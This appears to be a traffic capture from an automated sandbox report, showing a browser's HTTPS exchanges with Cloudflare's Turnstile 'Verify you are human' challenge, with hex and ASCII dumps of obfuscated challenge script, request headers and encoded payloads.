                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 73 74 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22
                                                                                                                                                                                                                                Data Ascii: sts.","human_button_text":"Verify%20you%20are%20human","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_feedback_report":"Having%20trouble%3F","turnstile_verifying":"Verifying...","turnstile_footer_privacy":"
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 39 30 31 35 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 36 33 32 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 4a 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 67 4a 3d 67 49 2c 66 3d 7b 27 72 76 65 79 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 7a 6f 66 50 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 41 72 43 53 45 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 74 76 42 6d 75 27 3a 66 75 6e 63
                                                                                                                                                                                                                                Data Ascii: break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,790153),eM=this||self,eN=eM[gI(632)],eO=function(c,gJ,f,g,h,i,j,k){for(gJ=gI,f={'rveyx':function(l,m){return l+m},'zofPH':function(l,m){return l(m)},'ArCSE':function(l,m){return l-m},'tvBmu':func
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 35 30 29 5d 5b 67 5a 28 36 36 39 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 5a 28 31 36 35 32 29 5d 5b 67 5a 28 31 30 34 33 29 5d 26 26 67 5b 67 5a 28 31 39 33 31 29 5d 3f 67 5b 67 5a 28 31 36 35 32 29 5d 5b 67 5a 28 31 30 34 33 29 5d 28 6e 65 77 20 67 5b 28 67 5a 28 31 39 33 31 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 31 2c 48 29 7b 69 66 28 68 31 3d 67 5a 2c 6f 5b 68 31 28 31 30 30 31 29 5d 28 68 31 28 31 37 37 30 29 2c 6f 5b 68 31 28 31 32 39 36 29 5d 29 29 78 28 6f 5b 68 31 28 39 31 37 29 5d 29 2c 73 28 68 31 28 31 32 34 30 29 29 3b 65 6c 73 65 7b 66 6f 72 28 47 5b 68 31 28 35 36 37 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 68 31 28 36 35 31 29 5d 3b 6f 5b 68 31 28 31 30 30 31 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 68 31 28
                                                                                                                                                                                                                                Data Ascii: 50)][gZ(669)](h))),x=g[gZ(1652)][gZ(1043)]&&g[gZ(1931)]?g[gZ(1652)][gZ(1043)](new g[(gZ(1931))](x)):function(G,h1,H){if(h1=gZ,o[h1(1001)](h1(1770),o[h1(1296)]))x(o[h1(917)]),s(h1(1240));else{for(G[h1(567)](),H=0;H<G[h1(651)];o[h1(1001)](G[H],G[H+1])?G[h1(
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 67 5b 6c 5d 5b 68 32 28 31 37 36 34 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 69 5b 68 32 28 36 30 38 29 5d 28 65 59 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 68 32 28 39 30 37 29 5d 28 27 6f 2e 27 2b 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 68 32 28 31 36 33 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 68 33 29 7b 72 65 74 75 72 6e 20 68 33 3d 68 32 2c 69 5b 68 33 28 31 38 31 34 29 5d 28 27 6f 2e 27 2c 6e 29 7d 29 7d 2c 65 5a 3d 5b 5d 2c 66 30 3d 30 3b 32 35 36 3e 66 30 3b 65 5a 5b 66 30 5d 3d 53 74 72 69 6e 67 5b 67 49 28 31 33 39 35 29 5d 28 66 30 29 2c 66 30 2b 2b 29 3b 67 47 3d 28 66 31 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 31 38 36 38 29 29 2c 66 32 3d 61
                                                                                                                                                                                                                                Data Ascii: g[l][h2(1764)](h[j[k]][m])&&(i[h2(608)](eY,h[j[k]][m])||g[l][h2(907)]('o.'+h[j[k]][m])),m++);}else g[l]=h[j[k]][h2(1631)](function(n,h3){return h3=h2,i[h3(1814)]('o.',n)})},eZ=[],f0=0;256>f0;eZ[f0]=String[gI(1395)](f0),f0++);gG=(f1=(0,eval)(gI(1868)),f2=a
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 28 31 31 37 34 29 5d 3d 43 2c 4a 53 4f 4e 5b 69 38 28 39 37 37 29 5d 28 6e 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 46 5b 69 38 28 34 32 35 29 5d 28 6b 5b 69 38 28 35 36 35 29 5d 2c 6b 5b 69 38 28 31 31 37 32 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 46 5b 69 38 28 31 31 37 31 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 69 66 28 21 46 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 46 5b 69 38 28 31 33 30 38 29 5d 28 6b 5b 69 38 28 31 36 39 32 29 5d 28 27 76 5f 27 2b 65 4d 5b 69 38 28 31 37 33 39 29 5d 5b 69 38 28 31 38 30 36 29 5d 2b 27 3d 27 2c 44 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 73 3d 65 4d 5b 69 38 28 31 37 33 39 29 5d 5b 69 38
                                                                                                                                                                                                                                Data Ascii: (1174)]=C,JSON[i8(977)](n));continue;case'1':F[i8(425)](k[i8(565)],k[i8(1172)]);continue;case'2':F[i8(1171)]=2500;continue;case'3':if(!F)return;continue;case'4':F[i8(1308)](k[i8(1692)]('v_'+eM[i8(1739)][i8(1806)]+'=',D));continue;case'5':s=eM[i8(1739)][i8
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 63 29 7b 69 63 3d 69 39 2c 65 4d 5b 69 63 28 31 34 36 35 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 69 39 28 31 32 30 30 29 5d 5b 69 39 28 36 36 31 29 5d 28 6a 5b 69 39 28 37 30 34 29 5d 2c 6d 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 46 3d 7b 7d 2c 66 46 5b 67 49 28 34 37 32 29 5d 3d 66 45 2c 65 4d 5b 67 49 28 31 31 34 35 29 5d 3d 66 46 2c 66 48 3d 65 4d 5b 67 49 28 31 37 33 39 29 5d 5b 67 49 28 37 35 39 29 5d 5b 67 49 28 34 34 39 29 5d 2c 66 49 3d 65 4d 5b 67 49 28 31 37 33 39 29 5d 5b 67 49 28 37 35 39 29 5d 5b 67 49 28 31 31 31 36 29 5d 2c 66 54 3d 21 5b 5d 2c 67 36 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 49 28 31 32 30 34 29 5d 28 67 49 28 37 38 32 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 6a 33 2c 64 2c 65 29 7b 6a 33 3d 67 49 2c 64 3d 7b 27 76
                                                                                                                                                                                                                                Data Ascii: c){ic=i9,eM[ic(1465)]()},1e3),eM[i9(1200)][i9(661)](j[i9(704)],m));return![]},fF={},fF[gI(472)]=fE,eM[gI(1145)]=fF,fH=eM[gI(1739)][gI(759)][gI(449)],fI=eM[gI(1739)][gI(759)][gI(1116)],fT=![],g6=undefined,eM[gI(1204)](gI(782),function(c,j3,d,e){j3=gI,d={'v
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 5b 67 49 28 31 37 34 33 29 5d 3d 67 30 2c 67 46 5b 67 49 28 31 34 30 30 29 5d 3d 67 45 2c 67 46 5b 67 49 28 31 31 32 31 29 5d 3d 67 31 2c 67 46 5b 67 49 28 37 37 35 29 5d 3d 67 35 2c 67 46 5b 67 49 28 31 39 31 34 29 5d 3d 67 32 2c 67 46 5b 67 49 28 31 38 30 32 29 5d 3d 66 58 2c 67 46 5b 67 49 28 31 30 36 38 29 5d 3d 66 57 2c 65 4d 5b 67 49 28 34 30 32 29 5d 3d 67 46 2c 66 75 6e 63 74 69 6f 6e 28 6a 47 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 47 3d 67 49 2c 64 3d 7b 27 72 6d 75 66 65 27 3a 6a 47 28 39 31 35 29 2c 27 55 6b 4b 68 4b 27 3a 6a 47 28 37 35 36 29 2c 27 75 42 78 56 6e 27 3a 6a 47 28 31 35 34 34 29 2c 27 45 67 4c 48 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 56 52 46 68 4c 27 3a 66 75 6e
                                                                                                                                                                                                                                Data Ascii: [gI(1743)]=g0,gF[gI(1400)]=gE,gF[gI(1121)]=g1,gF[gI(775)]=g5,gF[gI(1914)]=g2,gF[gI(1802)]=fX,gF[gI(1068)]=fW,eM[gI(402)]=gF,function(jG,d,e,f,g){return jG=gI,d={'rmufe':jG(915),'UkKhK':jG(756),'uBxVn':jG(1544),'EgLHO':function(h,i){return h^i},'VRFhL':fun
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 47 28 39 32 36 29 2c 27 78 4f 73 41 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6d 43 58 6b 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 63 66 66 6c 74 27 3a 6a 47 28 37 37 36 29 2c 27 4e 73 62 57 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 4c 44 79 52 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 52 79 69 4e 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 68 46 51 69 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 45 53 6b 4a 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                                                                                                                                Data Ascii: G(926),'xOsAD':function(h,i){return h(i)},'mCXki':function(h,i){return i!=h},'cfflt':jG(776),'NsbWT':function(h,i){return i!=h},'LDyRt':function(h,i){return h==i},'RyiNV':function(h,i){return h(i)},'hFQiV':function(h,i){return i*h},'ESkJR':function(h,i){r
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 64 5b 6a 49 28 31 37 38 33 29 5d 2c 44 5b 6a 49 28 31 33 34 38 29 5d 5b 6a 49 28 36 31 30 29 5d 28 50 2c 27 2a 27 29 29 3b 65 6c 73 65 7b 69 66 28 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 4b 3c 69 5b 6a 49 28 36 35 31 29 5d 3b 4b 2b 3d 31 29 69 66 28 64 5b 6a 49 28 31 37 32 35 29 5d 28 64 5b 6a 49 28 39 30 35 29 5d 2c 6a 49 28 31 36 31 36 29 29 29 72 65 74 75 72 6e 20 76 6f 69 64 28 69 28 6a 49 28 36 33 33 29 2c 66 75 6e 63 74 69 6f 6e 28 51 2c 6a 4c 29 7b 6a 4c 3d 6a 49 2c 51 5b 6a 4c 28 31 33 39 32 29 5d 3d 6f 28 6a 4c 28 39 32 35 29 29 7d 29 2c 4b 28 6a 49 28 36 33 31 29 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                Data Ascii: d[jI(1783)],D[jI(1348)][jI(610)](P,'*'));else{if(i==null)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;K<i[jI(651)];K+=1)if(d[jI(1725)](d[jI(905)],jI(1616)))return void(i(jI(633),function(Q,jL){jL=jI,Q[jL(1392)]=o(jL(925))}),K(jI(631),function(


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                60192.168.2.449820104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3162
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 742272a500bdc81
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC3162OUTData Raw: 76 5f 38 63 63 66 64 37 65 61 37 66 37 33 32 33 38 61 3d 2d 46 4a 51 39 51 44 51 46 51 67 51 6a 77 50 38 77 50 63 51 77 30 57 5a 33 74 77 59 50 33 50 47 55 30 43 53 6f 50 4f 58 68 50 6f 6f 77 35 50 4e 50 76 30 59 5a 42 6f 4b 50 34 50 48 51 48 5a 50 72 56 42 33 6f 50 66 50 35 6f 57 55 6e 76 77 30 45 50 2d 50 50 45 46 50 4e 66 55 47 56 78 56 51 33 5a 48 64 43 33 36 6b 4a 6c 4a 78 51 57 35 50 55 37 56 31 79 4b 50 34 31 46 48 34 48 46 70 75 53 50 41 50 43 76 66 43 50 2d 4a 58 4a 50 79 6f 48 76 43 42 6f 6a 4f 4c 51 39 77 68 76 72 36 49 73 72 77 51 48 2d 34 6f 48 52 48 51 4e 58 50 58 5a 78 50 50 42 74 50 33 79 42 51 48 79 64 36 43 50 50 36 30 48 38 62 52 30 53 4b 42 46 35 34 51 48 6a 50 57 56 50 59 4e 56 50 34 6f 69 46 51 33 35 50 57 30 5a 50 25 32 62 6b 32 64
                                                                                                                                                                                                                                Data Ascii: v_8ccfd7ea7f73238a=-FJQ9QDQFQgQjwP8wPcQw0WZ3twYP3PGU0CSoPOXhPoow5PNPv0YZBoKP4PHQHZPrVB3oPfP5oWUnvw0EP-PPEFPNfUGVxVQ3ZHdC36kJlJxQW5PU7V1yKP41FH4HFpuSPAPCvfCP-JXJPyoHvCBojOLQ9whvr6IsrwQH-4oHRHQNXPXZxPPBtP3yBQHyd6CPP60H8bR0SKBF54QHjPWVPYNVP4oiFQ35PW0ZP%2bk2d
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:16 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 152172
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: 02fLNtU3brIB0mf05Xll6g+XO2EvJEaCed2LHYx4HQb2GKh+KMS7nLiE5QSiSGqhUvbg4xQJVZKIBHideYNc+PBrc/xfciXQ4g9SIMJzwVhWDAc0sn9rivSAK2bwXSMwteYWF8YbHLuzWxj994ZHqKc3jbbmvUQCaVxRZNUkQhSfBpBT0m+TQgKmAJ6BV7NSm7+mbr7ZbrWCcOgOdeztobzJa15VEHhrTY7SSLDbfSGA125JelrrsTbeMsNbH1J3P1Ip0CySyWRR1fJ9czseMOrCjk21Ca9YwVv2MqbqhliGsoNlmvxbFY01ML3LG65uwi3aK34dmsnuzMD+iE6fx3G2rS4DiVsmFfaAx6KMzrwyND4ipSrp3B3t7rnAXGLABK79EF2MaYpVfNlRTQAQHQgOMt1orjQF6Vp7n3JKSV/i+HV6vAbLNDRFvVmEn2viSnRlnOVFxJNlyuQk/IzZgmUgHavUkphqgp4rgb+CF2mz4vs=$TgglhIkxx04OPLcm
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7f62f75435c-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC652INData Raw: 73 4b 31 34 6b 6e 71 56 76 61 47 6e 6d 5a 71 4a 6f 70 6e 4e 77 4d 32 6e 31 70 48 58 73 62 6a 49 70 62 66 61 6b 63 69 76 32 65 44 50 78 4b 2f 64 31 61 54 53 35 4d 4f 66 71 63 71 37 79 63 7a 6b 71 72 44 4d 38 4e 44 42 75 50 75 34 36 66 4f 31 37 39 50 38 75 62 62 64 31 51 6a 48 78 51 44 42 2b 76 55 4b 32 73 76 39 36 52 4c 51 41 2b 45 4c 30 52 62 70 31 4e 4c 59 38 42 6e 33 30 2f 34 42 33 2f 33 6a 47 74 37 6a 33 43 55 46 42 76 6e 6d 38 44 44 39 36 76 45 69 37 51 44 33 45 41 6f 76 38 76 67 4a 4f 52 67 76 48 6b 49 44 39 79 4a 47 42 7a 63 73 52 54 39 4d 53 53 52 47 54 30 49 76 52 6a 59 71 43 6a 55 33 55 46 67 6d 53 6b 78 4b 4f 78 38 31 52 46 5a 48 4d 55 4e 62 59 43 4e 66 58 55 35 6e 50 46 41 6f 4b 6b 35 6d 59 45 4e 5a 63 6e 4e 36 57 47 70 70 54 32 31 66 63 34 46
                                                                                                                                                                                                                                Data Ascii: sK14knqVvaGnmZqJopnNwM2n1pHXsbjIpbfakciv2eDPxK/d1aTS5MOfqcq7yczkqrDM8NDBuPu46fO179P8ubbd1QjHxQDB+vUK2sv96RLQA+EL0Rbp1NLY8Bn30/4B3/3jGt7j3CUFBvnm8DD96vEi7QD3EAov8vgJORgvHkID9yJGBzcsRT9MSSRGT0IvRjYqCjU3UFgmSkxKOx81RFZHMUNbYCNfXU5nPFAoKk5mYENZcnN6WGppT21fc4F
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 71 34 39 6e 6e 71 4e 6d 64 49 79 78 69 6f 6d 70 75 61 5a 76 6c 49 39 36 6d 4b 7a 42 6c 36 36 59 6e 72 37 42 6d 70 2b 35 77 4d 57 47 6a 36 71 4a 77 6f 61 76 73 62 50 48 71 4e 53 77 72 5a 65 7a 6c 39 53 7a 34 74 43 64 30 73 43 35 78 72 4b 38 75 74 2f 56 37 4d 7a 74 7a 4e 7a 51 78 36 7a 69 38 61 2f 74 36 74 72 55 75 74 37 2b 7a 2b 2b 36 7a 51 44 63 76 4c 6e 6f 2b 4f 49 43 2f 4e 7a 68 2f 75 50 63 37 65 67 52 37 51 33 56 39 67 67 52 44 4f 34 58 33 52 66 64 2b 76 59 51 33 67 59 49 48 52 34 67 43 66 55 66 4a 50 67 63 49 79 6a 38 35 53 63 73 41 69 51 72 4d 41 59 34 4c 7a 51 4b 38 54 4d 34 44 78 6f 33 50 41 38 30 4f 30 41 54 53 44 39 45 46 77 4a 44 53 42 77 66 4c 52 45 31 4a 6a 67 56 4f 46 52 4c 58 46 70 4a 54 32 49 61 51 31 6c 42 50 32 59 31 50 32 63 65 50 47 70
                                                                                                                                                                                                                                Data Ascii: q49nnqNmdIyxiompuaZvlI96mKzBl66Ynr7Bmp+5wMWGj6qJwoavsbPHqNSwrZezl9Sz4tCd0sC5xrK8ut/V7MztzNzQx6zi8a/t6trUut7+z++6zQDcvLno+OIC/Nzh/uPc7egR7Q3V9ggRDO4X3Rfd+vYQ3gYIHR4gCfUfJPgcIyj85ScsAiQrMAY4LzQK8TM4Dxo3PA80O0ATSD9EFwJDSBwfLRE1JjgVOFRLXFpJT2IaQ1lBP2Y1P2cePGp
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 4b 6d 57 6d 58 4f 6b 72 35 32 34 6e 36 79 52 76 58 6d 32 66 70 2b 30 66 6f 4b 57 68 61 65 39 76 4a 69 33 77 4a 75 36 72 63 4b 67 6b 37 48 47 70 61 2b 6d 79 37 32 2f 7a 4d 2b 2f 32 71 36 75 6e 65 4b 79 75 37 2f 72 31 64 62 4d 79 73 71 70 78 4f 6a 62 73 74 37 57 31 62 66 69 32 74 72 45 35 74 37 64 7a 65 49 41 35 4e 37 6b 42 72 38 43 33 4e 6b 4a 2b 63 6e 4e 31 38 2f 63 45 75 4d 51 35 41 72 30 31 77 50 6a 32 77 55 4d 45 4e 33 59 47 2b 6f 56 44 79 48 36 38 52 67 6d 2f 76 58 72 35 76 34 77 42 7a 49 54 48 78 59 6b 37 65 30 4d 4f 66 72 32 45 68 4d 2b 4c 41 34 53 41 67 77 35 50 44 55 6d 4f 30 41 54 53 44 39 45 46 77 4a 44 53 42 77 66 4c 52 45 31 4a 6a 67 56 4f 46 52 4c 58 46 70 4a 54 32 49 6a 57 42 31 62 50 43 67 33 4b 6a 55 70 4f 32 70 6a 57 57 56 4f 5a 6a 4e 67
                                                                                                                                                                                                                                Data Ascii: KmWmXOkr524n6yRvXm2fp+0foKWhae9vJi3wJu6rcKgk7HGpa+my72/zM+/2q6uneKyu7/r1dbMysqpxOjbst7W1bfi2trE5t7dzeIA5N7kBr8C3NkJ+cnN18/cEuMQ5Ar01wPj2wUMEN3YG+oVDyH68Rgm/vXr5v4wBzITHxYk7e0MOfr2EhM+LA4SAgw5PDUmO0ATSD9EFwJDSBwfLRE1JjgVOFRLXFpJT2IjWB1bPCg3KjUpO2pjWWVOZjNg
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 61 73 6d 35 2b 72 6b 6f 71 57 6e 5a 61 50 66 37 32 63 6d 63 61 2b 6d 34 36 6c 6e 37 4c 51 76 6f 71 54 71 4a 65 70 31 37 71 35 71 64 75 2b 6d 4c 33 56 79 35 7a 62 31 38 66 46 33 36 43 39 34 4d 58 72 31 36 6a 4e 36 64 75 73 31 66 58 58 31 65 2f 33 34 37 48 4e 39 72 61 33 74 74 72 42 38 4f 54 77 33 4e 4c 58 41 76 51 43 2b 63 63 47 43 39 6e 2b 79 4f 7a 6d 35 78 58 77 44 64 45 59 42 41 6f 4a 2b 4e 76 63 43 77 73 46 2b 64 77 51 42 41 45 45 36 42 38 65 46 77 73 70 37 68 4c 70 45 67 77 41 47 42 6b 45 42 6a 72 33 4b 52 38 76 38 52 49 4f 49 44 59 68 4f 53 45 36 42 53 67 6e 47 43 34 62 50 42 6f 50 55 42 45 66 45 54 39 56 4c 68 42 4b 4b 52 56 58 46 43 77 71 47 69 77 33 4c 55 39 54 4e 44 74 56 61 55 4d 6a 61 6c 64 67 4c 31 6c 7a 62 54 45 2f 64 32 74 68 62 56 5a 72 56
                                                                                                                                                                                                                                Data Ascii: asm5+rkoqWnZaPf72cmca+m46ln7LQvoqTqJep17q5qdu+mL3Vy5zb18fF36C94MXr16jN6dus1fXX1e/347HN9ra3ttrB8OTw3NLXAvQC+ccGC9n+yOzm5xXwDdEYBAoJ+NvcCwsF+dwQBAEE6B8eFwsp7hLpEgwAGBkEBjr3KR8v8RIOIDYhOSE6BSgnGC4bPBoPUBEfET9VLhBKKRVXFCwqGiw3LU9TNDtVaUMjaldgL1lzbTE/d2thbVZrV
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 2f 77 61 61 4f 65 61 4f 30 67 70 61 62 72 72 61 4a 77 38 61 4d 71 59 32 2f 7a 4d 79 51 72 37 53 4e 33 4e 6e 66 6e 64 2f 61 6d 4e 4f 62 6e 72 6e 6f 31 74 79 38 78 65 43 31 33 65 6e 6d 38 75 4f 2f 72 2f 4c 4e 78 4d 76 50 36 4e 54 77 74 66 76 55 7a 2b 79 36 7a 74 54 65 77 64 7a 67 41 38 62 4c 78 4f 41 45 42 67 33 6a 38 50 50 75 38 65 38 4c 7a 74 58 73 32 52 41 47 43 68 54 37 36 76 41 63 34 65 48 64 45 78 34 49 41 51 49 61 44 2b 30 6b 37 68 72 79 37 76 49 32 38 69 41 4b 45 52 73 79 39 51 34 73 4f 6b 48 36 51 66 72 38 45 45 51 45 46 69 73 4c 4f 51 63 66 44 54 41 6d 53 54 77 73 4c 42 4d 2f 4a 52 45 6b 4b 45 39 4c 4d 54 31 51 47 31 30 30 4c 6c 49 67 4e 56 5a 6b 56 6d 59 71 59 57 78 77 4c 30 55 2b 61 43 6f 73 62 33 56 49 64 55 5a 74 54 44 31 31 63 55 42 63 57 58
